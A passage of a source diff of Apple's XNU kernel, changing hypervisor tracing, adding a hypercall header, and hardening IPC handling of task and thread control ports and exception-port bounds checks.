  *  fail for invalid index or absence of trap handlers, trap handler is
  *  responsible for validating targets */
@@ -244,10 +257,30 @@ void
 hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs)
 {
        DTRACE_HV2(guest__enter, uint32_t, vcpu_id, uint64_t *, vcpu_regs);
+
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_START, vcpu_id);
 }
 
 void
-hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs)
+hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t reason)
 {
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id,
+           reason);
+
        DTRACE_HV2(guest__exit, uint32_t, vcpu_id, uint64_t *, vcpu_regs);
 }
+
+void
+hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t failure,
+    uint32_t error)
+{
+       /*
+        * An error indicates that the guest enter failed so there will be no
+        * guest exit. Close the guest enter interval.
+        */
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id,
+           -1, failure, error);
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ERROR), vcpu_id, failure, error);
+
+       DTRACE_HV3(guest__error, uint32_t, vcpu_id, uint64_t *, vcpu_regs, uint32_t, failure);
+}
index 0b7fa64d133a08ef086e2c70d1b30a426764a0cd..a744516a94195fcf0a8b1521688eb2911df0f469 100644 (file)
@@ -36,6 +36,7 @@ extern "C" {
 #include <stdint.h>
 #include <kern/kern_types.h>
 #include <mach/kern_return.h>
+#include <kern/hv_io_notifier.h>
 
 typedef enum {
        HV_DEBUG_STATE
@@ -60,6 +61,8 @@ typedef struct {
        void (*thread_destroy)(void *vcpu);
        void (*task_destroy)(void *vm);
        void (*volatile_state)(void *vcpu, int state);
+#define HV_CALLBACKS_RESUME_DEFINED 1
+       void (*resume)(void);
        void (*memory_pressure)(void);
 } hv_callbacks_t;
 
@@ -79,13 +82,17 @@ extern void hv_release_traps(hv_trap_type_t trap_type);
 extern kern_return_t hv_set_callbacks(hv_callbacks_t callbacks);
 extern void hv_release_callbacks(void);
 extern void hv_suspend(void);
+extern void hv_resume(void);
 extern kern_return_t hv_task_trap(uint64_t index, uint64_t arg);
 extern kern_return_t hv_thread_trap(uint64_t index, uint64_t arg);
 extern boolean_t hv_ast_pending(void);
 extern void hv_port_notify(mach_msg_header_t *msg);
 
 extern void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs);
-extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs);
+extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs,
+    uint32_t reason);
+extern void hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs,
+    uint32_t failure, uint32_t error);
 
 #if defined(__cplusplus)
 }
diff --git a/osfmk/kern/hvg_hypercall.h b/osfmk/kern/hvg_hypercall.h
new file mode 100644 (file)
index 0000000..d559fa3
--- /dev/null
@@ -0,0 +1,106 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _KERN_HVG_HYPERCALL_H_
+#define _KERN_HVG_HYPERCALL_H_
+
+#include <os/base.h>
+#include <stdint.h>
+
+/* Architecture-independent definitions (exported to userland) */
+
+/*
+ * Apple Hypercall arguments
+ */
+typedef struct hvg_hcall_args {
+       uint64_t args[6];
+} hvg_hcall_args_t;
+
+
+/*
+ * Apple Hypercall return output
+ */
+typedef struct hvg_hcall_output {
+       uint64_t regs[7];
+} hvg_hcall_output_t;
+
+
+/*
+ * Apple Hypercall return code
+ */
+
+OS_CLOSED_ENUM(hvg_hcall_return, uint32_t,
+    HVG_HCALL_SUCCESS             = 0x0000,       /* The call succeeded */
+    HVG_HCALL_ACCESS_DENIED       = 0x0001,       /* Invalid access right */
+    HVG_HCALL_INVALID_CODE        = 0x0002,       /* Hypercall code not recognized */
+    HVG_HCALL_INVALID_PARAMETER   = 0x0003,       /* Specified register value not valid */
+    HVG_HCALL_IO_FAILED           = 0x0004,       /* Input/output error */
+    HVG_HCALL_FEAT_DISABLED       = 0x0005,       /* Feature not available */
+    HVG_HCALL_UNSUPPORTED         = 0x0006,       /* Hypercall not supported */
+    );
+
+
+/*
+ * Apple Hypercall call code
+ */
+
+OS_CLOSED_ENUM(hvg_hcall_code, uint32_t,
+    HVG_HCALL_TRIGGER_DUMP        = 0x0001,       /* Collect guest dump */
+    );
+
+/*
+ * Options for collecting kernel vmcore
+ */
+
+OS_CLOSED_OPTIONS(hvg_hcall_dump_option, uint32_t,
+    HVG_HCALL_DUMP_OPTION_REGULAR   =  0x0001     /* Regular dump-guest-memory */
+    );
+
+typedef struct hvg_hcall_vmcore_file {
+       char tag[57];   /* 7 64-bit registers plus 1 byte for '\0' */
+} hvg_hcall_vmcore_file_t;
+
+extern hvg_hcall_return_t
+hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore,
+    const hvg_hcall_dump_option_t dump_option);
+
+
+#ifdef XNU_KERNEL_PRIVATE
+
+/*
+ * For XNU kernel use only (omitted from userland headers)
+ */
+
+#if defined (__x86_64__)
+#include <i386/cpuid.h>
+#include <i386/x86_hypercall.h>
+#endif
+
+#endif /* XNU_KERNEL_PRIVATE */
+
+#endif /* _KERN_HV_HYPERCALL_H_ */
index 427bcee120ad880d65b016c0bd702bf1c420c5fe..33612c5f99160283436411b40b7e5541df418e1c 100644 (file)
@@ -302,11 +302,17 @@ convert_port_to_host_priv(
 {
        host_t host = HOST_NULL;
 
+       /* reject translation if itk_host is not host_priv */
+       if (port != current_task()->itk_host) {
+               return HOST_NULL;
+       }
+
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port) &&
                    (ip_kotype(port) == IKOT_HOST_PRIV)) {
-                       host = (host_t) ip_get_kobject(port);
+                       assert(ip_get_kobject(port) == &realhost);
+                       host = &realhost;
                }
                ip_unlock(port);
        }
@@ -602,8 +608,6 @@ host_set_exception_ports(
        }
 #endif
 
-       assert(host_priv == &realhost);
-
        host_lock(host_priv);
 
        for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
@@ -696,8 +700,6 @@ host_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        host_lock(host_priv);
 
        count = 0;
@@ -716,16 +718,13 @@ host_get_exception_ports(
                                        break;
                                }
                        }/* for */
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
                                ports[j] =
                                    ipc_port_copy_send(host_priv->exc_actions[i].port);
                                behaviors[j] = host_priv->exc_actions[i].behavior;
                                flavors[j] = host_priv->exc_actions[i].flavor;
                                count++;
-                               if (count > *CountCnt) {
-                                       break;
-                               }
                        }
                }
        }/* for */
index 9a3e468b281b00a4cfb2d3e0773295ecf8bdc4b3..dc196835adba23a969238a35914614c12bb4cc6a 100644 (file)
 #include <device/device_types.h>
 #include <device/device_server.h>
 
+#if     CONFIG_USER_NOTIFICATION
 #include <UserNotification/UNDReplyServer.h>
+#endif
 
 #if     CONFIG_ARCADE
 #include <mach/arcade_register_server.h>
 #include <uk_xkern/xk_uproxy_server.h>
 #endif  /* XK_PROXY */
 
+#include <kern/counter.h>
 #include <kern/ipc_tt.h>
 #include <kern/ipc_mig.h>
 #include <kern/ipc_misc.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_voucher.h>
 #include <kern/sync_sema.h>
-#include <kern/counters.h>
 #include <kern/work_interval.h>
 #include <kern/suid_cred.h>
+#include <kern/task_ident.h>
 
 #if HYPERVISOR
 #include <kern/hv_support.h>
@@ -174,9 +177,6 @@ typedef struct {
        mig_routine_t routine;
        int size;
        int kobjidx;
-#if     MACH_COUNTERS
-       mach_counter_t callcount;
-#endif
 } mig_hash_t;
 
 #define MAX_MIG_ENTRIES 1031
@@ -213,7 +213,9 @@ static const struct mig_subsystem *mig_e[] = {
 #ifdef VM32_SUPPORT
        (const struct mig_subsystem *)&vm32_map_subsystem,
 #endif
+#if CONFIG_USER_NOTIFICATION
        (const struct mig_subsystem *)&UNDReply_subsystem,
+#endif
        (const struct mig_subsystem *)&mach_voucher_subsystem,
        (const struct mig_subsystem *)&mach_voucher_attr_control_subsystem,
        (const struct mig_subsystem *)&memory_entry_subsystem,
@@ -301,10 +303,6 @@ find_mig_hash_entry(int msgh_id)
 
        if (!ptr->routine || msgh_id != ptr->num) {
                ptr = (mig_hash_t *)0;
-       } else {
-#if     MACH_COUNTERS
-               ptr->callcount++;
-#endif
        }
 
        return ptr;
@@ -724,6 +722,9 @@ ipc_kobject_init_port(
        if (options & IPC_KOBJECT_ALLOC_IMMOVABLE_SEND) {
                port->ip_immovable_send = 1;
        }
+       if (options & IPC_KOBJECT_ALLOC_PINNED) {
+               port->ip_pinned = 1;
+       }
 }
 
 /*
@@ -791,6 +792,42 @@ ipc_kobject_alloc_labeled_port(
        return port;
 }
 
+static void
+ipc_kobject_subst_once_notify(mach_msg_header_t *msg)
+{
+       mach_no_senders_notification_t *notification = (void *)msg;
+       ipc_port_t port = notification->not_header.msgh_remote_port;
+
+       require_ip_active(port);
+       assert(IKOT_PORT_SUBST_ONCE == ip_kotype(port));
+
+       ip_release((ipc_port_t)ip_get_kobject(port));
+       ipc_port_dealloc_kernel(port);
+}
+
+/*
+ *     Routine:        ipc_kobject_alloc_subst_once
+ *     Purpose:
+ *             Make a port that will be substituted by the kolabel
+ *             rules once, preventing the next substitution (of its target)
+ *             to happen if any.
+ *
+ *     Returns:
+ *             A port with a send right, that will substitute to its "kobject".
+ *
+ *     Conditions:
+ *             No locks held (memory is allocated)
+ *             `target` has a refcount that this function consumes
+ */
+ipc_port_t
+ipc_kobject_alloc_subst_once(
+       ipc_port_t                  target)
+{
+       return ipc_kobject_alloc_labeled_port(target,
+                  IKOT_PORT_SUBST_ONCE, IPC_LABEL_SUBST_ONCE,
+                  IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
+}
+
 /*
  *     Routine:        ipc_kobject_make_send_lazy_alloc_port
  *     Purpose:
@@ -820,6 +857,7 @@ ipc_kobject_make_send_lazy_alloc_port(
        ipc_port_t              *port_store,
        ipc_kobject_t           kobject,
        ipc_kobject_type_t      type,
+       ipc_kobject_alloc_options_t alloc_opts,
        boolean_t               __ptrauth_only should_ptrauth,
        uint64_t                __ptrauth_only ptrauth_discriminator)
 {
@@ -839,7 +877,7 @@ ipc_kobject_make_send_lazy_alloc_port(
 
        if (!IP_VALID(port)) {
                port = ipc_kobject_alloc_port(kobject, type,
-                   IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
+                   IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST | alloc_opts);
 
 #if __has_feature(ptrauth_calls)
                if (should_ptrauth) {
@@ -1009,40 +1047,150 @@ ipc_kobject_destroy(
 }
 
 /*
- *     Routine:         ipc_kobject_label_check
+ *     Routine:        ipc_kobject_label_substitute_task
+ *     Purpose:
+ *             Substitute a task control port for its immovable
+ *             equivalent when the receiver is that task.
+ *     Conditions:
+ *             Space is write locked and active.
+ *             Port is locked and active.
+ *     Returns:
+ *             - IP_NULL port if no substitution is to be done
+ *             - a valid port if a substitution needs to happen
+ */
+static ipc_port_t
+ipc_kobject_label_substitute_task(
+       ipc_space_t             space,
+       ipc_port_t              port)
+{
+       ipc_port_t subst = IP_NULL;
+       task_t task = ipc_kobject_get(port);
+
+       if (task != TASK_NULL && task == space->is_task) {
+               if ((subst = port->ip_alt_port)) {
+                       return subst;
+               }
+       }
+
+       return IP_NULL;
+}
+
+/*
+ *     Routine:        ipc_kobject_label_substitute_thread
+ *     Purpose:
+ *             Substitute a thread control port for its immovable
+ *             equivalent when it belongs to the receiver task.
+ *     Conditions:
+ *             Space is write locked and active.
+ *             Port is locked and active.
+ *     Returns:
+ *             - IP_NULL port if no substitution is to be done
+ *             - a valid port if a substitution needs to happen
+ */
+static ipc_port_t
+ipc_kobject_label_substitute_thread(
+       ipc_space_t             space,
+       ipc_port_t              port)
+{
+       ipc_port_t subst = IP_NULL;
+       thread_t thread = ipc_kobject_get(port);
+
+       if (thread != THREAD_NULL && space->is_task == thread->task) {
+               if ((subst = port->ip_alt_port) != IP_NULL) {
+                       return subst;
+               }
+       }
+
+       return IP_NULL;
+}
+
+/*
+ *     Routine:        ipc_kobject_label_check
  *     Purpose:
- *             Check to see if the space is allowed to possess a
- *      right for the given port. In order to qualify, the
- *      space label must contain all the privileges listed
- *      in the port/kobject label.
+ *             Check to see if the space is allowed to possess
+ *             a right for the given port. In order to qualify,
+ *             the space label must contain all the privileges
+ *             listed in the port/kobject label.
  *
  *     Conditions:
  *             Space is write locked and active.
- *      Port is locked and active.
+ *             Port is locked and active.
+ *
+ *     Returns:
+ *             Whether the copyout is authorized.
+ *
+ *             If a port substitution is requested, the space is unlocked,
+ *             the port is unlocked and its "right" consumed.
+ *
+ *             As of now, substituted ports only happen for send rights.
  */
-boolean_t
+bool
 ipc_kobject_label_check(
-       ipc_space_t                   space,
-       ipc_port_t                    port,
-       __unused mach_msg_type_name_t msgt_name)
+       ipc_space_t                     space,
+       ipc_port_t                      port,
+       mach_msg_type_name_t            msgt_name,
+       ipc_object_copyout_flags_t     *flags,
+       ipc_port_t                     *subst_portp)
 {
        ipc_kobject_label_t labelp;
+       ipc_label_t label;
 
        assert(is_active(space));
        assert(ip_active(port));
 
+       *subst_portp = IP_NULL;
+
        /* Unlabled ports/kobjects are always allowed */
        if (!ip_is_kolabeled(port)) {
-               return TRUE;
+               return true;
        }
 
        /* Never OK to copyout the receive right for a labeled kobject */
        if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) {
-               panic("ipc_kobject_label_check: attempted receive right copyout for labeled kobject");
+               panic("ipc_kobject_label_check: attempted receive right "
+                   "copyout for labeled kobject");
        }
 
        labelp = port->ip_kolabel;
-       return (labelp->ikol_label & space->is_label) == labelp->ikol_label;
+       label = labelp->ikol_label;
+
+       if ((*flags & IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK) == 0 &&
+           (label & IPC_LABEL_SUBST_MASK)) {
+               ipc_port_t subst = IP_NULL;
+
+               if (msgt_name != MACH_MSG_TYPE_PORT_SEND) {
+                       return false;
+               }
+
+               switch (label & IPC_LABEL_SUBST_MASK) {
+               case IPC_LABEL_SUBST_TASK:
+                       subst = ipc_kobject_label_substitute_task(space, port);
+                       break;
+               case IPC_LABEL_SUBST_THREAD:
+                       subst = ipc_kobject_label_substitute_thread(space, port);
+                       break;
+               case IPC_LABEL_SUBST_ONCE:
+                       /* the next check will _not_ substitute */
+                       *flags |= IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK;
+                       subst = ip_get_kobject(port);
+                       break;
+               default:
+                       panic("unexpected label: %llx\n", label);
+               }
+
+               if (subst != IP_NULL) {
+                       ip_reference(subst);
+                       is_write_unlock(space);
+                       ipc_port_release_send_and_unlock(port);
+                       port = ipc_port_make_send(subst);
+                       ip_release(subst);
+                       *subst_portp = port;
+                       return true;
+               }
+       }
+
+       return (label & space->is_label & IPC_LABEL_SPACE_MASK) ==
+              (label & IPC_LABEL_SPACE_MASK);
 }
 
 boolean_t
@@ -1083,6 +1231,10 @@ ipc_kobject_notify(
                        ipc_voucher_attr_control_notify(request_header);
                        return TRUE;
 
+               case IKOT_PORT_SUBST_ONCE:
+                       ipc_kobject_subst_once_notify(request_header);
+                       return TRUE;
+
                case IKOT_SEMAPHORE:
                        semaphore_notify(request_header);
                        return TRUE;
@@ -1139,6 +1291,9 @@ ipc_kobject_notify(
                case IKOT_SUID_CRED:
                        suid_cred_notify(request_header);
                        return TRUE;
+               case IKOT_TASK_ID_TOKEN:
+                       task_id_token_notify(request_header);
+                       return TRUE;
 #if HYPERVISOR
                case IKOT_HYPERVISOR:
                        hv_port_notify(request_header);
index 02614a531ca8bc018ddad8cedb834097ba43edc2..62c55cc9a816164096e32808f80c5abc9b440fbe 100644 (file)
@@ -98,7 +98,7 @@ typedef natural_t       ipc_kobject_type_t;
 #define IKOT_PSET                       6
 #define IKOT_PSET_NAME                  7
 #define IKOT_TIMER                      8
-#define IKOT_PAGING_REQUEST             9
+#define IKOT_PORT_SUBST_ONCE            9
 #define IKOT_MIG                        10
 #define IKOT_MEMORY_OBJECT              11
 #define IKOT_XMM_PAGER                  12
@@ -139,12 +139,13 @@ typedef natural_t       ipc_kobject_type_t;
 #define IKOT_THREAD_READ                47
 #define IKOT_SUID_CRED                  48
 #define IKOT_HYPERVISOR                 49
+#define IKOT_TASK_ID_TOKEN              50
 
 /*
  * Add new entries here and adjust IKOT_UNKNOWN.
  * Please keep ipc/ipc_object.c:ikot_print_array up to date.
  */
-#define IKOT_UNKNOWN                    50      /* magic catchall       */
+#define IKOT_UNKNOWN                    51      /* magic catchall */
 #define IKOT_MAX_TYPE   (IKOT_UNKNOWN+1)        /* # of IKOT_ types    */
 
 /* set the bitstring index for kobject */
@@ -191,6 +192,8 @@ __options_decl(ipc_kobject_alloc_options_t, uint32_t, {
        IPC_KOBJECT_ALLOC_IMMOVABLE_SEND = 0x00000008,
        /* Add a label structure to the port */
        IPC_KOBJECT_ALLOC_LABEL = 0x00000010,
+       /* Make all rights pinned (non dealloc-able) in an ipc space*/
+       IPC_KOBJECT_ALLOC_PINNED    = 0x00000020,
 });
 
 /* Allocates a kobject port, never fails */
@@ -206,11 +209,15 @@ extern ipc_port_t ipc_kobject_alloc_labeled_port(
        ipc_label_t                 label,
        ipc_kobject_alloc_options_t options);
 
+extern ipc_port_t ipc_kobject_alloc_subst_once(
+       ipc_port_t                  target);
+
 /* Makes a send right, lazily allocating a kobject port, arming for no-senders, never fails */
 extern boolean_t ipc_kobject_make_send_lazy_alloc_port(
        ipc_port_t                 *port_store,
        ipc_kobject_t               kobject,
        ipc_kobject_type_t          type,
+       ipc_kobject_alloc_options_t alloc_opts,
        boolean_t                   should_ptrauth,
        uint64_t                    ptrauth_discriminator) __result_use_check;
 
@@ -235,10 +242,28 @@ ipc_kobject_get(ipc_port_t port)
 }
 
 /* Check if a kobject can be copied out to a given space */
-extern boolean_t ipc_kobject_label_check(
-       ipc_space_t space,
-       ipc_port_t port,
-       mach_msg_type_name_t msgt_name);
+extern bool     ipc_kobject_label_check(
+       ipc_space_t                 space,
+       ipc_port_t                  port,
+       mach_msg_type_name_t        msgt_name,
+       ipc_object_copyout_flags_t *flags,
+       ipc_port_t                 *subst_portp) __result_use_check;
+
+__result_use_check
+static inline bool
+ip_label_check(
+       ipc_space_t                 space,
+       ipc_port_t                  port,
+       mach_msg_type_name_t        msgt_name,
+       ipc_object_copyout_flags_t *flags,
+       ipc_port_t                 *subst_portp)
+{
+       if (!ip_is_kolabeled(port)) {
+               *subst_portp = IP_NULL;
+               return true;
+       }
+       return ipc_kobject_label_check(space, port, msgt_name, flags, subst_portp);
+}
 
 /* Release any kernel object resources associated with a port */
 extern void ipc_kobject_destroy(
@@ -249,6 +274,21 @@ extern void ipc_kobject_destroy(
 extern kern_return_t
 uext_server(ipc_kmsg_t request, ipc_kmsg_t * reply);
 
+/* These boot-args decide if the pinned and immovable ports can be copied out to IPC space */
+__options_decl(ipc_control_port_options_t, uint32_t, {
+       IPC_CONTROL_PORT_OPTIONS_NONE           = 0x00,
+
+       IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT    = 0x01,
+       IPC_CONTROL_PORT_OPTIONS_PINNED_HARD    = 0x02,
+
+       IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT = 0x10,
+       IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD = 0x20,
+});
+
+extern ipc_control_port_options_t ipc_control_port_options;
+extern bool pinned_control_port_enabled;
+extern bool immovable_control_port_enabled;
+
 #endif /* MACH_KERNEL_PRIVATE */
 
 #endif /* KERNEL_PRIVATE */
index d47764b905d2917fd05aee960782ef7fc36521e5..c1c99b9328f0a0e9718d0764c8e32b65912e4f06 100644 (file)
@@ -347,7 +347,7 @@ mach_msg_rpc_from_kernel(
        mach_msg_size_t         send_size,
        mach_msg_size_t         rcv_size)
 {
-       return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, NULL);
+       return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, TRUE, NULL);
 }
 #endif /* IKM_SUPPORT_LEGACY */
 
@@ -357,7 +357,7 @@ mach_msg_rpc_from_kernel_proper(
        mach_msg_size_t         send_size,
        mach_msg_size_t         rcv_size)
 {
-       return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, NULL);
+       return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, TRUE, NULL);
 }
 
 mach_msg_return_t
@@ -369,6 +369,7 @@ kernel_mach_msg_rpc(
        __unused
 #endif
        boolean_t           legacy,
+       boolean_t           interruptible,
        boolean_t           *message_moved)
 {
        thread_t self = current_thread();
@@ -449,7 +450,7 @@ kernel_mach_msg_rpc(
                require_ip_active(reply);
 
                /* JMM - why this check? */
-               if (!self->active && !self->inspection) {
+               if (interruptible && !self->active && !self->inspection) {
                        ipc_port_dealloc_reply(reply);
                        self->ith_rpc_reply = IP_NULL;
                        return MACH_RCV_INTERRUPTED;
@@ -462,7 +463,7 @@ kernel_mach_msg_rpc(
                    MACH_MSG_OPTION_NONE,
                    MACH_MSG_SIZE_MAX,
                    MACH_MSG_TIMEOUT_NONE,
-                   THREAD_INTERRUPTIBLE);
+                   interruptible ? THREAD_INTERRUPTIBLE : THREAD_UNINT);
 
                mr = self->ith_state;
                kmsg = self->ith_kmsg;
@@ -475,7 +476,7 @@ kernel_mach_msg_rpc(
                }
 
                assert(mr == MACH_RCV_INTERRUPTED);
-
+               assert(interruptible);
                assert(reply == self->ith_rpc_reply);
 
                if (self->ast & AST_APC) {
@@ -1036,7 +1037,7 @@ convert_mig_object_to_port(
         * if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&mig_object->port,
-           (ipc_kobject_t) mig_object, IKOT_MIG, false, 0)) {
+           (ipc_kobject_t) mig_object, IKOT_MIG, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                mig_object_deallocate(mig_object);
        }
 
index 48abc259163605ac87dd23462fa6a87ac2bd8c37..cbb2f2aa330b64def8e9207bd4a475fd0f00a5ab 100644 (file)
@@ -161,6 +161,7 @@ mach_msg_return_t kernel_mach_msg_rpc(
        mach_msg_size_t                     send_size,
        mach_msg_size_t                     rcv_size,
        boolean_t                           legacy,
+       boolean_t                           interruptible,
        boolean_t                           *message_moved);
 #endif /* XNU_KERNEL_PRIVATE */
 
index aaec28a5d4bd71b835a908f84ff61d0461085519..6e7638f5e5d7bf9c2f0aee2e87f74d6393992ddb 100644 (file)
@@ -156,7 +156,7 @@ fileport_invoke(task_t task, mach_port_name_t name,
 
        kr = ipc_object_copyin(task->itk_space, name,
            MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&fileport, 0, NULL,
-           IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
        if (kr != KERN_SUCCESS) {
                return kr;
        }
index 643c38fbb582f8bdbec3d7b84caba71a3d0cb08b..34bff56069832306f807609bc9adaa1aa968c1e0 100644 (file)
@@ -140,7 +140,7 @@ convert_semaphore_to_port(semaphore_t semaphore)
         * semaphore_notify if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&semaphore->port,
-           (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, false, 0)) {
+           (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                semaphore_dereference(semaphore);
        }
        return semaphore->port;
index 7a7d3b783ea1b5b998efcc19e5408c7150e7c21b..f02ed471a03c6c83d2db19e416cfc05327e2bcff 100644 (file)
@@ -91,6 +91,7 @@
 #include <kern/kalloc.h>
 #include <kern/thread.h>
 #include <kern/misc_protos.h>
+#include <kdp/kdp_dyld.h>
 
 #include <vm/vm_map.h>
 #include <vm/vm_pageout.h>
@@ -109,21 +110,18 @@ extern int cs_relax_platform_task_ports;
 extern boolean_t IOTaskHasEntitlement(task_t, const char *);
 
 /* forward declarations */
-task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval);
-task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port);
-task_read_t convert_port_to_locked_task_read(ipc_port_t port);
-static task_read_t convert_port_to_task_read_locked(ipc_port_t port);
 static kern_return_t port_allowed_with_task_flavor(int which, mach_task_flavor_t flavor);
 static kern_return_t port_allowed_with_thread_flavor(int which, mach_thread_flavor_t flavor);
-static task_inspect_t convert_port_to_task_inspect_locked(ipc_port_t port);
 static void ipc_port_bind_special_reply_port_locked(ipc_port_t port);
 static kern_return_t ipc_port_unbind_special_reply_port(thread_t thread, boolean_t unbind_active_port);
 kern_return_t task_conversion_eval(task_t caller, task_t victim);
 static ipc_space_t convert_port_to_space_no_eval(ipc_port_t port);
-static task_t convert_port_to_task_no_eval(ipc_port_t port);
 static thread_t convert_port_to_thread_no_eval(ipc_port_t port);
 static ipc_port_t convert_task_to_port_with_flavor(task_t task, mach_task_flavor_t flavor);
 static ipc_port_t convert_thread_to_port_with_flavor(thread_t thread, mach_thread_flavor_t flavor);
+static task_read_t convert_port_to_task_read_no_eval(ipc_port_t port);
+static thread_read_t convert_port_to_thread_read_no_eval(ipc_port_t port);
+static ipc_space_read_t convert_port_to_space_read_no_eval(ipc_port_t port);
 
 /*
  *     Routine:        ipc_task_init
@@ -144,7 +142,7 @@ ipc_task_init(
        ipc_space_t space;
        ipc_port_t kport;
        ipc_port_t nport;
-
+       ipc_port_t pport;
        kern_return_t kr;
        int i;
 
@@ -156,10 +154,21 @@ ipc_task_init(
 
        space->is_task = task;
 
-       kport = ipc_port_alloc_kernel();
+       if (immovable_control_port_enabled) {
+               ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               if (pinned_control_port_enabled) {
+                       options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+               pport = ipc_kobject_alloc_port(IKO_NULL, IKOT_NONE, options);
 
-       if (kport == IP_NULL) {
-               panic("ipc_task_init");
+               kport = ipc_kobject_alloc_labeled_port(IKO_NULL, IKOT_TASK_CONTROL,
+                   IPC_LABEL_SUBST_TASK, IPC_KOBJECT_ALLOC_NONE);
+               kport->ip_alt_port = pport;
+       } else {
+               kport = ipc_kobject_alloc_port(IKO_NULL, IKOT_TASK_CONTROL,
+                   IPC_KOBJECT_ALLOC_NONE);
+
+               pport = kport;
        }
 
        nport = ipc_port_alloc_kernel();
@@ -167,15 +176,21 @@ ipc_task_init(
                panic("ipc_task_init");
        }
 
+       if (pport == IP_NULL) {
+               panic("ipc_task_init");
+       }
+
        itk_lock_init(task);
-       task->itk_self[TASK_FLAVOR_CONTROL] = kport;
-       task->itk_self[TASK_FLAVOR_NAME] = nport;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = kport;
+       task->itk_task_ports[TASK_FLAVOR_NAME] = nport;
 
        /* Lazily allocated on-demand */
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
-       task->itk_resume = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
+       task->itk_dyld_notify = NULL;
 
+       task->itk_self = pport;
+       task->itk_resume = IP_NULL; /* Lazily allocated on-demand */
        if (task_is_a_corpse_fork(task)) {
                /*
                 * No sender's notification for corpse would not
@@ -221,7 +236,7 @@ ipc_task_init(
                }
        } else {
                itk_lock(parent);
-               assert(parent->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL);
+               assert(parent->itk_task_ports[TASK_FLAVOR_CONTROL] != IP_NULL);
 
                /* inherit registered ports */
 
@@ -280,24 +295,33 @@ ipc_task_enable(
        ipc_port_t nport;
        ipc_port_t iport;
        ipc_port_t rdport;
+       ipc_port_t pport;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       assert(!task->ipc_active || task_is_a_corpse(task));
+       task->ipc_active = true;
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
